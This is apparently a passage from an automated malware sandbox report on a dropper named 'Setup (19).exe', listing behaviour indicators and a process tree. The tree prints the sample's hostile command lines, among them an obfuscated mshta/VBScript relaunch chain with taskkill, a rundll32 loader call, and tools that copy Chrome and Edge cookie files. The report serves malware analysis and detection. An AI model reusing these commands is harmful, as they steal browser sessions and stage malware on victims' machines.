WerFault.exe 3120 Process not Found 3120 Process not Found -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3120 Process not Found -
Suspicious behavior: MapViewOfSection 56 IoCs
pid Process 4268 NrLBDgFrC3ZdkgRSNcLC8zYU.exe 6492 purlMAaYQeQTs03DWB9pFjHY.exe 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 3120 Process not Found 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 3120 Process not Found 3120 Process not Found 5564 explorer.exe 5564 explorer.exe 3120 Process not Found 3120 Process not Found 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 3120 Process not Found 3120 Process not Found 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 3120 Process not Found 3120 Process not Found 5564 explorer.exe 5564 explorer.exe 3120 Process not Found 3120 Process not Found 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe 5564 explorer.exe -
Suspicious behavior: SetClipboardViewer 2 IoCs
pid Process 3448 2993625.exe 6412 1766672.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1328 XNEWCHpYJd0x0btof4XyW7NO.exe Token: SeRestorePrivilege 1468 MsiExec.exe Token: SeBackupPrivilege 1468 MsiExec.exe Token: SeDebugPrivilege 4768 taskkill.exe Token: SeDebugPrivilege 5080 7404692.exe Token: SeDebugPrivilege 4376 WJ_e7HTdrLfMNW8xRKfMDvdr.exe Token: SeDebugPrivilege 1004 wOvfwfxpjNKg86YqEsq3Um02.exe Token: SeDebugPrivilege 968 rXWNCjyQ7NdIRIQgLUvwmIJb.exe Token: SeDebugPrivilege 3716 msedge.exe Token: SeShutdownPrivilege 3120 Process not Found Token: SeCreatePagefilePrivilege 3120 Process not Found Token: SeShutdownPrivilege 3120 Process not Found Token: SeCreatePagefilePrivilege 3120 Process not Found Token: SeShutdownPrivilege 3120 Process not Found Token: SeCreatePagefilePrivilege 3120 Process not Found Token: SeShutdownPrivilege 3120 Process not Found Token: SeCreatePagefilePrivilege 3120 Process not Found Token: SeShutdownPrivilege 3120 Process not Found Token: SeCreatePagefilePrivilege 3120 Process not Found Token: SeShutdownPrivilege 3120 Process not Found Token: SeCreatePagefilePrivilege 3120 Process not Found Token: SeShutdownPrivilege 3120 Process not Found Token: SeCreatePagefilePrivilege 3120 Process not Found Token: SeShutdownPrivilege 3120 Process not Found Token: SeCreatePagefilePrivilege 3120 Process not Found Token: SeShutdownPrivilege 3120 Process not Found Token: SeCreatePagefilePrivilege 3120 Process not Found Token: SeShutdownPrivilege 3120 Process not Found Token: SeCreatePagefilePrivilege 3120 Process not Found Token: SeShutdownPrivilege 3120 Process not Found Token: SeCreatePagefilePrivilege 3120 Process not Found Token: SeShutdownPrivilege 3120 Process not Found Token: SeCreatePagefilePrivilege 3120 Process not Found Token: SeShutdownPrivilege 3120 Process not Found Token: SeCreatePagefilePrivilege 3120 Process not Found Token: SeShutdownPrivilege 3120 Process not Found Token: SeCreatePagefilePrivilege 3120 Process not Found Token: SeDebugPrivilege 2468 Esplorarne.exe.com Token: SeShutdownPrivilege 3120 Process not Found Token: SeCreatePagefilePrivilege 3120 Process not Found Token: SeShutdownPrivilege 3120 Process not Found Token: SeCreatePagefilePrivilege 3120 Process not Found Token: SeShutdownPrivilege 3120 Process not Found Token: SeCreatePagefilePrivilege 3120 Process not Found Token: SeShutdownPrivilege 3120 Process not Found Token: SeCreatePagefilePrivilege 3120 Process not Found Token: SeShutdownPrivilege 3120 Process not Found Token: SeCreatePagefilePrivilege 3120 Process not Found Token: SeShutdownPrivilege 3120 Process not Found Token: SeCreatePagefilePrivilege 3120 Process not Found Token: SeShutdownPrivilege 3120 Process not Found Token: SeCreatePagefilePrivilege 3120 Process not Found Token: SeCreateTokenPrivilege 1232 WerFault.exe Token: SeAssignPrimaryTokenPrivilege 1232 WerFault.exe Token: SeLockMemoryPrivilege 1232 WerFault.exe Token: SeIncreaseQuotaPrivilege 1232 WerFault.exe Token: SeMachineAccountPrivilege 1232 WerFault.exe Token: SeTcbPrivilege 1232 WerFault.exe Token: SeSecurityPrivilege 1232 WerFault.exe Token: SeTakeOwnershipPrivilege 1232 WerFault.exe Token: SeLoadDriverPrivilege 1232 WerFault.exe Token: SeSystemProfilePrivilege 1232 WerFault.exe Token: SeSystemtimePrivilege 1232 WerFault.exe Token: SeProfSingleProcessPrivilege 1232 WerFault.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 3160 6n21lHOo_9b7d4XrFw3oprcv.tmp 1460 Cleaner Installation.exe 1548 Inlog.tmp 2288 Esplorarne.exe.com 2144 OmkgDhSsYmPCdoo1bg6tebQE.exe 6660 Setup.exe 5116 Cleaner.exe 816 CompPkgSrv.exe 5728 Setup.tmp 6984 Setup.tmp 6984 Setup.tmp 6984 Setup.tmp 6984 Setup.tmp 6984 Setup.tmp 6984 Setup.tmp 6984 Setup.tmp 6984 Setup.tmp 6984 Setup.tmp 6984 Setup.tmp 6984 Setup.tmp 6984 Setup.tmp 6984 Setup.tmp 6984 Setup.tmp 6984 Setup.tmp 6984 Setup.tmp 6984 Setup.tmp 6984 Setup.tmp 6984 Setup.tmp 6984 Setup.tmp 6984 Setup.tmp 6984 Setup.tmp 6984 Setup.tmp 6984 Setup.tmp 6984 Setup.tmp 6984 Setup.tmp 6984 Setup.tmp 6984 Setup.tmp 6984 Setup.tmp 6984 Setup.tmp 6984 Setup.tmp 6984 Setup.tmp 6984 Setup.tmp 6984 Setup.tmp 6984 Setup.tmp 6984 Setup.tmp 6984 Setup.tmp 6984 Setup.tmp 6984 Setup.tmp 6984 Setup.tmp 6984 Setup.tmp 6984 Setup.tmp 6984 Setup.tmp 6984 Setup.tmp 6984 Setup.tmp 6984 Setup.tmp 6984 Setup.tmp 6984 Setup.tmp 6984 Setup.tmp 6984 Setup.tmp 6984 Setup.tmp 6984 Setup.tmp 6984 Setup.tmp 6984 Setup.tmp 6984 Setup.tmp -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 5780 Esplorarne.exe.com 5780 Esplorarne.exe.com 5780 Esplorarne.exe.com 5996 Esplorarne.exe.com 5996 Esplorarne.exe.com 5996 Esplorarne.exe.com 4660 Esplorarne.exe.com 4660 Esplorarne.exe.com 4660 Esplorarne.exe.com 3428 Esplorarne.exe.com 3428 Esplorarne.exe.com 3428 Esplorarne.exe.com 5904 Esplorarne.exe.com 5904 Esplorarne.exe.com 5904 Esplorarne.exe.com 228 Esplorarne.exe.com 228 Esplorarne.exe.com 228 Esplorarne.exe.com 3780 Esplorarne.exe.com 3780 Esplorarne.exe.com 3780 Esplorarne.exe.com 1580 Esplorarne.exe.com 1580 Esplorarne.exe.com 1580 Esplorarne.exe.com 5976 anyname.exe 5976 anyname.exe 5976 anyname.exe 6572 Esplorarne.exe.com 6572 Esplorarne.exe.com 6572 Esplorarne.exe.com 5960 Esplorarne.exe.com 5960 Esplorarne.exe.com 5960 Esplorarne.exe.com 6796 Esplorarne.exe.com 6796 Esplorarne.exe.com 6796 Esplorarne.exe.com 1356 Esplorarne.exe.com 1356 Esplorarne.exe.com 1356 Esplorarne.exe.com 3840 Esplorarne.exe.com 3840 Esplorarne.exe.com 3840 Esplorarne.exe.com 2716 Esplorarne.exe.com 2716 Esplorarne.exe.com 2716 Esplorarne.exe.com 2288 Esplorarne.exe.com 2288 Esplorarne.exe.com 2288 Esplorarne.exe.com 5720 Esplorarne.exe.com 5720 Esplorarne.exe.com 5720 Esplorarne.exe.com 4256 Esplorarne.exe.com 4256 Esplorarne.exe.com 4256 Esplorarne.exe.com 5412 Esplorarne.exe.com 5412 Esplorarne.exe.com 5412 Esplorarne.exe.com 6592 Esplorarne.exe.com 6592 Esplorarne.exe.com 6592 Esplorarne.exe.com 6352 Esplorarne.exe.com 6352 Esplorarne.exe.com 6352 Esplorarne.exe.com 5676 Esplorarne.exe.com -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 6424 DBBB.exe 5660 cmd.exe 6860 MaskVPNUpdate.exe -
Suspicious use of UnmapMainImage 1 IoCs
pid Process 3120 Process not Found -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4756 wrote to memory of 556 4756 Setup (19).exe 87 PID 4756 wrote to memory of 556 4756 Setup (19).exe 87 PID 4756 wrote to memory of 556 4756 Setup (19).exe 87 PID 4756 wrote to memory of 1176 4756 Setup (19).exe 86 PID 4756 wrote to memory of 1176 4756 Setup (19).exe 86 PID 4756 wrote to memory of 1176 4756 Setup (19).exe 86 PID 4756 wrote to memory of 1632 4756 Setup (19).exe 89 PID 4756 wrote to memory of 1632 4756 Setup (19).exe 89 PID 4756 wrote to memory of 1632 4756 Setup (19).exe 89 PID 4756 wrote to memory of 4376 4756 Setup (19).exe 91 PID 4756 wrote to memory of 4376 4756 Setup (19).exe 91 PID 4756 wrote to memory of 4376 4756 Setup (19).exe 91 PID 4756 wrote to memory of 1520 4756 Setup (19).exe 90 PID 4756 wrote to memory of 1520 4756 Setup (19).exe 90 PID 4756 wrote to memory of 1520 4756 Setup (19).exe 90 PID 4756 wrote to memory of 1328 4756 Setup (19).exe 88 PID 4756 wrote to memory of 1328 4756 Setup (19).exe 88 PID 4756 wrote to memory of 3760 4756 Setup (19).exe 99 PID 4756 wrote to memory of 3760 4756 Setup (19).exe 99 PID 4756 wrote to memory of 3760 4756 Setup (19).exe 99 PID 4756 wrote to memory of 3716 4756 Setup (19).exe 98 PID 4756 wrote to memory of 3716 4756 Setup (19).exe 98 PID 4756 wrote to memory of 3716 4756 Setup (19).exe 98 PID 4756 wrote to memory of 4472 4756 Setup (19).exe 94 PID 4756 wrote to memory of 4472 4756 Setup (19).exe 94 PID 4756 wrote to memory of 4472 4756 Setup (19).exe 94 PID 4756 wrote to memory of 4804 4756 Setup (19).exe 93 PID 4756 wrote to memory of 3184 4756 Setup (19).exe 95 PID 4756 wrote to memory of 4804 4756 Setup (19).exe 93 PID 4756 wrote to memory of 4804 4756 Setup (19).exe 93 PID 4756 wrote to memory of 3184 4756 Setup (19).exe 95 PID 4756 wrote to memory of 3184 4756 Setup (19).exe 95 PID 4756 wrote to memory of 1164 4756 Setup (19).exe 106 PID 4756 wrote to memory of 1164 4756 Setup (19).exe 106 PID 4756 wrote to memory of 1164 4756 Setup (19).exe 106 PID 4756 wrote to memory of 968 4756 Setup (19).exe 105 PID 4756 wrote to memory of 968 4756 Setup (19).exe 105 PID 4756 wrote to memory of 968 4756 Setup (19).exe 105 PID 4756 wrote to memory of 1292 4756 Setup (19).exe 102 PID 4756 wrote to memory of 1292 4756 Setup (19).exe 102 PID 4756 wrote to memory of 1292 4756 Setup (19).exe 102 PID 4756 wrote to memory of 1004 4756 Setup (19).exe 104 PID 4756 wrote to memory of 1004 4756 Setup (19).exe 104 PID 4756 wrote to memory of 1004 4756 Setup (19).exe 104 PID 4756 wrote to memory of 1204 4756 Setup (19).exe 103 PID 4756 wrote to memory of 1204 4756 Setup (19).exe 103 PID 4756 wrote to memory of 1204 4756 Setup (19).exe 103 PID 4756 wrote to memory of 1832 4756 Setup (19).exe 100 PID 4756 wrote to memory of 1832 4756 Setup (19).exe 100 PID 4756 wrote to memory of 1832 4756 Setup (19).exe 100 PID 4756 wrote to memory of 3696 4756 Setup (19).exe 112 PID 4756 wrote to memory of 3696 4756 Setup (19).exe 112 PID 4756 wrote to memory of 3696 4756 Setup (19).exe 112 PID 1164 wrote to memory of 1528 1164 jvR92GSd8iMEJXGEP_8BYtDn.exe 113 PID 1164 wrote to memory of 1528 1164 jvR92GSd8iMEJXGEP_8BYtDn.exe 113 PID 1164 wrote to memory of 1528 1164 jvR92GSd8iMEJXGEP_8BYtDn.exe 113 PID 1292 wrote to memory of 2584 1292 Yc94pk6Qb8xoa9ZqzcuEiAiz.exe 115 PID 1292 wrote to memory of 2584 1292 Yc94pk6Qb8xoa9ZqzcuEiAiz.exe 115 PID 1292 wrote to memory of 2584 1292 Yc94pk6Qb8xoa9ZqzcuEiAiz.exe 115 PID 4756 wrote to memory of 4728 4756 Setup (19).exe 114 PID 4756 wrote to memory of 4728 4756 Setup (19).exe 114 PID 4756 wrote to memory of 4728 4756 Setup (19).exe 114 PID 1292 wrote to memory of 2688 1292 Yc94pk6Qb8xoa9ZqzcuEiAiz.exe 116 PID 1292 wrote to memory of 2688 1292 Yc94pk6Qb8xoa9ZqzcuEiAiz.exe 116
Processes
-
C:\Users\Admin\AppData\Local\Temp\Setup (19).exe"C:\Users\Admin\AppData\Local\Temp\Setup (19).exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4756 -
C:\Users\Admin\Documents\4zv49o0BReBcTSeSJWSxuJQU.exe"C:\Users\Admin\Documents\4zv49o0BReBcTSeSJWSxuJQU.exe"2⤵
- Executes dropped EXE
PID:1176 -
C:\Users\Admin\Documents\4zv49o0BReBcTSeSJWSxuJQU.exeC:\Users\Admin\Documents\4zv49o0BReBcTSeSJWSxuJQU.exe3⤵
- Executes dropped EXE
PID:2012 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2012 -s 1644⤵
- Loads dropped DLL
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:3732
-
-
-
-
C:\Users\Admin\Documents\xS4bPod6q8LOd2_YCiund2nD.exe"C:\Users\Admin\Documents\xS4bPod6q8LOd2_YCiund2nD.exe"2⤵
- Executes dropped EXE
PID:556 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 556 -s 3083⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:960
-
-
-
C:\Users\Admin\Documents\XNEWCHpYJd0x0btof4XyW7NO.exe"C:\Users\Admin\Documents\XNEWCHpYJd0x0btof4XyW7NO.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1328 -
C:\Users\Admin\AppData\Roaming\5154525.exe"C:\Users\Admin\AppData\Roaming\5154525.exe"3⤵
- Executes dropped EXE
PID:2712
-
-
C:\Users\Admin\AppData\Roaming\8365054.exe"C:\Users\Admin\AppData\Roaming\8365054.exe"3⤵
- Executes dropped EXE
PID:2372 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2372 -s 24524⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5936
-
-
-
C:\Users\Admin\AppData\Roaming\6044150.exe"C:\Users\Admin\AppData\Roaming\6044150.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
PID:1852
-
-
C:\Users\Admin\AppData\Roaming\7404692.exe"C:\Users\Admin\AppData\Roaming\7404692.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5080 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5080 -s 23524⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:2428
-
-
-
-
C:\Users\Admin\Documents\NrLBDgFrC3ZdkgRSNcLC8zYU.exe"C:\Users\Admin\Documents\NrLBDgFrC3ZdkgRSNcLC8zYU.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1632 -
C:\Users\Admin\Documents\NrLBDgFrC3ZdkgRSNcLC8zYU.exe"C:\Users\Admin\Documents\NrLBDgFrC3ZdkgRSNcLC8zYU.exe"3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4268
-
-
-
C:\Users\Admin\Documents\p5GfN9yXVX6XndpczBb4lArn.exe"C:\Users\Admin\Documents\p5GfN9yXVX6XndpczBb4lArn.exe"2⤵
- Executes dropped EXE
PID:1520 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1520 -s 2923⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:2784
-
-
-
C:\Users\Admin\Documents\WJ_e7HTdrLfMNW8xRKfMDvdr.exe"C:\Users\Admin\Documents\WJ_e7HTdrLfMNW8xRKfMDvdr.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:4376
-
-
C:\Users\Admin\Documents\n5nTSRcErppPLBkBjsISDV39.exe"C:\Users\Admin\Documents\n5nTSRcErppPLBkBjsISDV39.exe"2⤵
- Executes dropped EXE
PID:4804 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4804 -s 3243⤵
- Program crash
PID:1468
-
-
-
C:\Users\Admin\Documents\106F8hgdUBvXKgZ3NYbZ3pyB.exe"C:\Users\Admin\Documents\106F8hgdUBvXKgZ3NYbZ3pyB.exe"2⤵
- Executes dropped EXE
PID:4472
-
-
C:\Users\Admin\Documents\y2MTuWuQtoPlnFfXprEpHn2p.exe"C:\Users\Admin\Documents\y2MTuWuQtoPlnFfXprEpHn2p.exe"2⤵
- Executes dropped EXE
PID:3184
-
-
C:\Users\Admin\Documents\yoSELgi7GveD0SOTSBcpGphr.exe"C:\Users\Admin\Documents\yoSELgi7GveD0SOTSBcpGphr.exe"2⤵
- Executes dropped EXE
PID:3716
-
-
C:\Users\Admin\Documents\MBJox4dDfp3iXpYL1uMWDcV9.exe"C:\Users\Admin\Documents\MBJox4dDfp3iXpYL1uMWDcV9.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3760 -
C:\Users\Admin\Documents\MBJox4dDfp3iXpYL1uMWDcV9.exeC:\Users\Admin\Documents\MBJox4dDfp3iXpYL1uMWDcV9.exe3⤵
- Executes dropped EXE
PID:1568
-
-
C:\Users\Admin\Documents\MBJox4dDfp3iXpYL1uMWDcV9.exeC:\Users\Admin\Documents\MBJox4dDfp3iXpYL1uMWDcV9.exe3⤵
- Executes dropped EXE
PID:2468
-
-
-
C:\Users\Admin\Documents\W2ic2Ov8QaJnMZlYezKOyERW.exe"C:\Users\Admin\Documents\W2ic2Ov8QaJnMZlYezKOyERW.exe"2⤵
- Executes dropped EXE
PID:1832 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1832 -s 2723⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6036
-
-
-
C:\Users\Admin\Documents\Yc94pk6Qb8xoa9ZqzcuEiAiz.exe"C:\Users\Admin\Documents\Yc94pk6Qb8xoa9ZqzcuEiAiz.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1292 -
C:\Program Files (x86)\Company\NewProduct\jooyu.exe"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"3⤵
- Executes dropped EXE
PID:2584 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:2288
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
PID:5892
-
-
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"3⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:2688
-
-
C:\Program Files (x86)\Company\NewProduct\customer3.exe"C:\Program Files (x86)\Company\NewProduct\customer3.exe"3⤵
- Executes dropped EXE
PID:3572 -
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:720
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
PID:3592
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
PID:5512
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:2280
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:5520
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:4828
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:2764
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:5908
-
-
-
-
C:\Users\Admin\Documents\ILaP9xOkc_blH5CYYCVjGqbU.exe"C:\Users\Admin\Documents\ILaP9xOkc_blH5CYYCVjGqbU.exe"2⤵
- Executes dropped EXE
PID:1204 -
C:\Users\Admin\Documents\ILaP9xOkc_blH5CYYCVjGqbU.exe"C:\Users\Admin\Documents\ILaP9xOkc_blH5CYYCVjGqbU.exe" -q3⤵
- Executes dropped EXE
PID:4320
-
-
-
C:\Users\Admin\Documents\wOvfwfxpjNKg86YqEsq3Um02.exe"C:\Users\Admin\Documents\wOvfwfxpjNKg86YqEsq3Um02.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:1004
-
-
C:\Users\Admin\Documents\rXWNCjyQ7NdIRIQgLUvwmIJb.exe"C:\Users\Admin\Documents\rXWNCjyQ7NdIRIQgLUvwmIJb.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:968
-
-
C:\Users\Admin\Documents\jvR92GSd8iMEJXGEP_8BYtDn.exe"C:\Users\Admin\Documents\jvR92GSd8iMEJXGEP_8BYtDn.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1164 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN("C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\jvR92GSd8iMEJXGEP_8BYtDn.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\jvR92GSd8iMEJXGEP_8BYtDn.exe"" ) do taskkill -f -iM ""%~NxA"" ",0 , TRUE) )3⤵PID:1528
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\jvR92GSd8iMEJXGEP_8BYtDn.exe" hBS_VbW.EXE&&StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" =="" for %A In ("C:\Users\Admin\Documents\jvR92GSd8iMEJXGEP_8BYtDn.exe" ) do taskkill -f -iM "%~NxA"4⤵PID:3392
-
C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXEhbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS5⤵
- Executes dropped EXE
PID:3196 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN("C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF ""-p3auHHA5Pn7qj14hc1xRG9TH8FS "" == """" for %A In (""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" ) do taskkill -f -iM ""%~NxA"" ",0 , TRUE) )6⤵PID:4052
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" hBS_VbW.EXE&&StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "-p3auHHA5Pn7qj14hc1xRG9TH8FS " =="" for %A In ("C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" ) do taskkill -f -iM "%~NxA"7⤵PID:3756
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" .\QnEJR.fPC,a6⤵PID:3732
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "jvR92GSd8iMEJXGEP_8BYtDn.exe"5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4768
-
-
-
-
-
C:\Users\Admin\Documents\guGQCvRkO5mz3ZAOCzM5s1Yr.exe"C:\Users\Admin\Documents\guGQCvRkO5mz3ZAOCzM5s1Yr.exe"2⤵
- Executes dropped EXE
PID:3696 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3696 -s 2803⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:1500
-
-
-
C:\Users\Admin\Documents\6n21lHOo_9b7d4XrFw3oprcv.exe"C:\Users\Admin\Documents\6n21lHOo_9b7d4XrFw3oprcv.exe"2⤵
- Executes dropped EXE
PID:4728 -
C:\Users\Admin\AppData\Local\Temp\is-QTFBV.tmp\6n21lHOo_9b7d4XrFw3oprcv.tmp"C:\Users\Admin\AppData\Local\Temp\is-QTFBV.tmp\6n21lHOo_9b7d4XrFw3oprcv.tmp" /SL5="$102C0,138429,56832,C:\Users\Admin\Documents\6n21lHOo_9b7d4XrFw3oprcv.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:3160 -
C:\Users\Admin\AppData\Local\Temp\is-K3F2K.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-K3F2K.tmp\Setup.exe" /Verysilent4⤵PID:1580
-
C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe"C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent5⤵
- Executes dropped EXE
PID:3708 -
C:\Users\Admin\AppData\Local\Temp\is-3JAQ0.tmp\Inlog.tmp"C:\Users\Admin\AppData\Local\Temp\is-3JAQ0.tmp\Inlog.tmp" /SL5="$302B8,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:1548 -
C:\Users\Admin\AppData\Local\Temp\is-CD4SE.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-CD4SE.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 7217⤵PID:3908
-
C:\Users\Admin\AppData\Local\Temp\is-8CHFA.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-8CHFA.tmp\Setup.tmp" /SL5="$504F6,17367866,721408,C:\Users\Admin\AppData\Local\Temp\is-CD4SE.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 7218⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:5728 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-99M73.tmp\{app}\microsoft.cab -F:* %ProgramData%9⤵PID:6152
-
